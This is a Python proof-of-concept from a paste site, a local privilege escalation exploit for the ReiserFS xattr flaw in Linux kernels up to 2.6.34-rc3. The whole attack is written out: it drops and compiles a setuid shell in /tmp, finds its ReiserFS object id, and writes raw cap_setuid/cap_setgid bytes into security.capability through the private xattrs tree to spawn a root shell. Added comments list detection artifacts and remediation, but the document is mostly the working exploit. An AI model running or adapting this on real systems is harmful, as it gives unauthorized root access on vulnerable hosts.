TrojanCoder

Anu

Mar 26th, 2017
  1. #!/usr/bin/env python
  2.  
  3. '''
  4.  team-edward.py
  5.  
  6.  Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation
  7.  Jon Oberheide <jon@oberheide.org>
  8.  http://jon.oberheide.org
  9.  
  10.  Information:
  11.  
  12.    https://bugzilla.redhat.com/show_bug.cgi?id=568041
  13.  
  14.    The kernel allows processes to access the internal ".reiserfs_priv"
  15.    directory at the top of a reiserfs filesystem which is used to store
  16.    xattrs. Permissions are not enforced in that tree, so unprivileged
  17.    users can view and potentially modify the xattrs on arbitrary files.
  18.  
  19.  Usage:
  20.  
  21.    $ python team-edward.py
  22.    [+] checking for reiserfs mount with user_xattr mount option
  23.    [+] checking for private xattrs directory at /.reiserfs_priv/xattrs
  24.    [+] preparing shell in /tmp
  25.    [+] capturing pre-shell snapshot of private xattrs directory
  26.    [+] compiling shell in /tmp
  27.    [+] setting dummy xattr to get reiserfs object id
  28.    [+] capturing post-shell snapshot of private xattrs directory
  29.    [+] found 1 new object ids
  30.    [+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468
  31.    [+] spawning setuid shell...
  32.    # id
  33.    uid=0(root) gid=0(root) groups=4(adm), ...
  34.  
  35.  Notes:
  36.  
  37.    Obviously requires a ReiserFS filesystem mounted with extended attributes.
  38.    Tested on Ubuntu Jaunty 9.10.
  39. '''
  40.  
  41. import os, sys
  42.  
# C source that main() writes to /tmp/team-edward.c and compiles with gcc.
# The program calls setgid(0) and setuid(0) and then execs /bin/sh; those
# calls can only succeed for an unprivileged caller once the binary has been
# given the capabilities that main() writes via XATTR below.
SHELL = 'int main(void) { setgid(0); setuid(0); execl("/bin/sh", "sh", 0); }'
# Raw bytes that main() writes to <object id>/security.capability under
# /.reiserfs_priv/xattrs. main()'s status message describes the effect as
# "setting cap_setuid/cap_setgid capabilities".
# NOTE(review): the layout looks like a ReiserFS on-disk xattr header followed
# by a VFS file-capability record whose permitted mask is 0xc0 -- confirm
# against the kernel headers before relying on this description.
# Defender view: the observable result is a user-owned file that carries a
# security.capability xattr nobody set through setcap; a recursive getcap
# sweep (`getcap -r`) over user-writable paths would surface it.
XATTR = '\x41\x58\x46\x52\xc1\x00\x00\x02\x01\x00\x00\x02\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
  45.  
def err(txt):
    """Print *txt* as a '[-] error: ' line on stdout and exit with status 1."""
    line = '[-] error: %s' % txt
    print(line)
    sys.exit(1)
  49.  
def msg(txt):
    """Print *txt* as a '[+] '-prefixed progress line on stdout."""
    line = '[+] %s' % txt
    print(line)
  52.  
def main():
    """Run the proof-of-concept steps listed in the module docstring.

    Every step has a side effect on the host (files in /tmp, child processes,
    writes under /.reiserfs_priv), and the two directory snapshots must
    bracket the compile and setfattr steps, so statement order is significant.

    Host-side artifacts visible in this function, useful for detection and
    triage:
      * /tmp/team-edward.c and /tmp/team-edward created by the calling user
      * gcc and setfattr child processes started through os.system()
      * a non-root process listing /.reiserfs_priv/xattrs and opening a
        security.capability file below it for writing
    The module docstring ties the issue to kernels <= 2.6.34-rc3 and to the
    Red Hat bug it links; a kernel carrying that fix is the remediation.
    """
    msg('checking for reiserfs mount with user_xattr mount option')

    # Precondition check: looks for an /etc/fstab line naming both reiserfs
    # and user_xattr. For a defender, the same two strings identify the
    # hosts that are in scope for this issue.
    f = open('/etc/fstab')
    for line in f:
        if 'reiserfs' in line and 'user_xattr' in line:
            break
    else:
        # for/else: reached only when no line matched; err() exits the
        # process, so the close() below is skipped on this path.
        err('failed to find a reiserfs mount with user_xattr')
    f.close()

    msg('checking for private xattrs directory at /.reiserfs_priv/xattrs')

    # The path being visible to an unprivileged process is itself the
    # symptom described in the module docstring ("Permissions are not
    # enforced in that tree").
    if not os.path.exists('/.reiserfs_priv/xattrs'):
        err('failed to locate private xattrs directory')

    msg('preparing shell in /tmp')

    # Drops the C source held in SHELL at a fixed, predictable path.
    f = open('/tmp/team-edward.c', 'w')
    f.write(SHELL)
    f.close()

    msg('capturing pre-shell snapshot of private xattrs directory')

    # Baseline listing taken before the new file has any xattr.
    pre = set(os.listdir('/.reiserfs_priv/xattrs'))
   
    msg('compiling shell in /tmp')

    # Requires a compiler on the host; -w suppresses gcc warnings.
    ret = os.system('gcc -w /tmp/team-edward.c -o /tmp/team-edward')
    if ret != 0:
        err('error compiling shell, you need gcc')

    msg('setting dummy xattr to get reiserfs object id')

    # Setting any user xattr makes an entry for the binary appear under
    # /.reiserfs_priv/xattrs, which the snapshot diff below relies on.
    os.system('setfattr -n "user.hax" -v "hax" /tmp/team-edward')
    # NOTE(review): the return value of the setfattr call above is not
    # captured; `ret` still holds the gcc status, which was already checked
    # to be 0, so this branch cannot report a setfattr failure.
    if ret != 0:
        err('error setting xattr, you need setfattr')

    msg('capturing post-shell snapshot of private xattrs directory')

    post = set(os.listdir('/.reiserfs_priv/xattrs'))

    # Entries present now but not in the baseline. Anything else on the
    # filesystem that gained its first xattr in the same window would also
    # land in this set.
    objs = post.difference(pre)

    msg('found %s new object ids' % len(objs))

    for obj in objs:
        msg('setting cap_setuid/cap_setgid capabilities on object id %s' % obj)
   
        # The security-relevant write: an unprivileged process stores the
        # XATTR bytes as the security.capability attribute through the
        # private tree. A write to this path by a non-root uid is the
        # highest-signal event in the whole sequence.
        f = open('/.reiserfs_priv/xattrs/%s/security.capability' % obj, 'w')
        f.write(XATTR)
        f.close()

    msg('spawning setuid shell...')

    # Executes the compiled helper; os.system() blocks until it exits.
    os.system('/tmp/team-edward')
  109.  
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()